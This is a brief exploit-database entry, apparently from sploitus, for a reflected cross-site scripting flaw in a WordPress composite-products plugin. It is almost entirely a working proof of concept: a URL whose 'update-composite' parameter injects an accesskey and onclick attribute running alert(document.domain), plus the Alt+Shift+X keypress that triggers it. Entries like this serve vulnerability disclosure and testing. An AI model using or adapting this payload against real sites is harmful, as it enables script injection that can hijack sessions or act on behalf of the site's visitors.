Share
## https://sploitus.com/exploit?id=WPEX-ID:53F09438-A97F-4E72-8CDE-C61654164BDE
On a page where a Component Product is displayed, append ?update-composite=rrr%22%20accesskey=X%20onclick=alert(document.domain)%20xxx=%22, e.g:

https://example.com/product/test/?update-composite=rrr%22%20accesskey=X%20onclick=alert(document.domain)%20xxx=%22

Then press Alt +  Shift + X to trigger the XSS